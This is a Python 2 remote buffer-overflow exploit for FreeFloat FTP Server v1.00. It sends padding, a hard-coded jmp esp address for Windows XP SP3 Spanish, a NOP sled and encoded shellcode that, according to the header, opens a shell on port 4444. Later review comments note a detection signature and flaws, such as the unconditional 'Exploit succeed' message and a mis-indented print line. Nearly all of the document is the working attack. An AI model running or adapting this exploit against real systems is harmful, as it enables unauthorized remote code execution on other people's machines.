
FreeFloat FTP Server v1.00 Remote Buffer Overflow Exploit

#!/usr/bin/python

# FreeFloat FTP Server v1.00 Remote Buffer Overflow Exploit (No FTP Command Needed)
# written by localh0t
# Date: 29/07/11
# Contact: mattdch0@gmail.com
# Follow: @mattdch
# www.localh0t.com.ar | www.mfsec.com.ar
# Thanks to: Pr0zac, Irakirashia, Kchito
# Targets: Windows XP SP3 Spanish (No DEP) (Change as you wish)
# Shellcode: List shell on port 4444 (Change as you wish)
#
# NOTE(review): Python 2 script (print statements, str used as a byte buffer).
# Flow: open one TCP connection, read the banner, write a single overlong line
# before any FTP verb, read once more, exit. On the wire this is observable as
# a line of 251 0x41 bytes followed by several hundred opaque bytes and a bare
# "\n", sent right after the banner and before any command -- a usable
# detection signature for this PoC. Per the header the claimed outcome is a
# listener on TCP/4444 on the target; nothing in the script checks that.
# There are no timeouts and no error handling; the address and shellcode
# constants are opaque and their effect cannot be confirmed from this file.

from socket import *
import sys, struct, os

# Argument check: <host> <port>. sys.exit() carries no status, so a usage
# error still exits 0. NOTE(review): the usage line is indented one level
# deeper than its block as pasted.
if (len(sys.argv) < 3):
    print "\nFreeFloat FTP Server v1.00 Remote Buffer Overflow Exploit"
        print "\n   Usage: %s <host> <port> \n" %(sys.argv[0])
    sys.exit()

print "\n[!] Connecting to %s" %(sys.argv[1])
# connect to host
# NOTE(review): no settimeout() anywhere -- connect() and both recv() calls can
# block indefinitely; socket errors and a non-numeric port (int() ValueError)
# surface as uncaught tracebacks.
sock = socket(AF_INET,SOCK_STREAM)
sock.connect((sys.argv[1],int(sys.argv[2])))
# read and discard the server banner
sock.recv(1024)

# padding -- 251 bytes of 0x41 (`buffer` shadows the Python 2 builtin of that name)
buffer = "A" * 251

# jmp esp (shell32.dll Windows XP SP3 Spanish)
# NOTE(review): hard-coded 4-byte constant; per the comment it is tied to one
# DLL build on one OS/locale. Not verifiable from here.
buffer += "\x4f\x31\x6b\x7e"

# NOPsled
buffer += "\x90" * 20

# shellcode
# NOTE(review): opaque byte string. The header claims a shell listening on
# port 4444; its actual behaviour cannot be determined from this file.
buffer += ("\x33\xc9\x83\xe9\xaa\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e"+
"\xbb\xc1\x9c\x35\x83\xee\xfc\xe2\xf4\x47\x29\x15\x35\xbb\xc1"+
"\xfc\xbc\x5e\xf0\x4e\x51\x30\x93\xac\xbe\xe9\xcd\x17\x67\xaf"+
"\x4a\xee\x1d\xb4\x76\xd6\x13\x8a\x3e\xad\xf5\x17\xfd\xfd\x49"+
"\xb9\xed\xbc\xf4\x74\xcc\x9d\xf2\x59\x31\xce\x62\x30\x93\x8c"+
"\xbe\xf9\xfd\x9d\xe5\x30\x81\xe4\xb0\x7b\xb5\xd6\x34\x6b\x91"+
"\x17\x7d\xa3\x4a\xc4\x15\xba\x12\x7f\x09\xf2\x4a\xa8\xbe\xba"+
"\x17\xad\xca\x8a\x01\x30\xf4\x74\xcc\x9d\xf2\x83\x21\xe9\xc1"+
"\xb8\xbc\x64\x0e\xc6\xe5\xe9\xd7\xe3\x4a\xc4\x11\xba\x12\xfa"+
"\xbe\xb7\x8a\x17\x6d\xa7\xc0\x4f\xbe\xbf\x4a\x9d\xe5\x32\x85"+
"\xb8\x11\xe0\x9a\xfd\x6c\xe1\x90\x63\xd5\xe3\x9e\xc6\xbe\xa9"+
"\x2a\x1a\x68\xd3\xf2\xae\x35\xbb\xa9\xeb\x46\x89\x9e\xc8\x5d"+
"\xf7\xb6\xba\x32\x44\x14\x24\xa5\xba\xc1\x9c\x1c\x7f\x95\xcc"+
"\x5d\x92\x41\xf7\x35\x44\x14\xcc\x65\xeb\x91\xdc\x65\xfb\x91"+
"\xf4\xdf\xb4\x1e\x7c\xca\x6e\x48\x5b\x04\x60\x92\xf4\x37\xbb"+
"\xd0\xc0\xbc\x5d\xab\x8c\x63\xec\xa9\x5e\xee\x8c\xa6\x63\xe0"+
"\xe8\x96\xf4\x82\x52\xf9\x63\xca\x6e\x92\xcf\x62\xd3\xb5\x70"+
"\x0e\x5a\x3e\x49\x62\x32\x06\xf4\x40\xd5\x8c\xfd\xca\x6e\xa9"+
"\xff\x58\xdf\xc1\x15\xd6\xec\x96\xcb\x04\x4d\xab\x8e\x6c\xed"+
"\x23\x61\x53\x7c\x85\xb8\x09\xba\xc0\x11\x71\x9f\xd1\x5a\x35"+
"\xff\x95\xcc\x63\xed\x97\xda\x63\xf5\x97\xca\x66\xed\xa9\xe5"+
"\xf9\x84\x47\x63\xe0\x32\x21\xd2\x63\xfd\x3e\xac\x5d\xb3\x46"+
"\x81\x55\x44\x14\x27\xc5\x0e\x63\xca\x5d\x1d\x54\x21\xa8\x44"+
"\x14\xa0\x33\xc7\xcb\x1c\xce\x5b\xb4\x99\x8e\xfc\xd2\xee\x5a"+
"\xd1\xc1\xcf\xca\x6e\xc1\x9c\x35")

# end connection -- a bare newline terminates the line; no FTP verb precedes it
buffer += "\x0a"

# send buffer
print "[!] Sending exploit..."
# NOTE(review): send() may return before every byte is written and its count
# is discarded; the following recv() assumes the server still answers.
sock.send(buffer)
sock.recv(1024)
sock.close()
# NOTE(review): success is reported unconditionally -- nothing above inspects
# the server's response.
print "[!] Exploit succeed. Now netcat %s on port 4444\n" %(sys.argv[1])
sys.exit()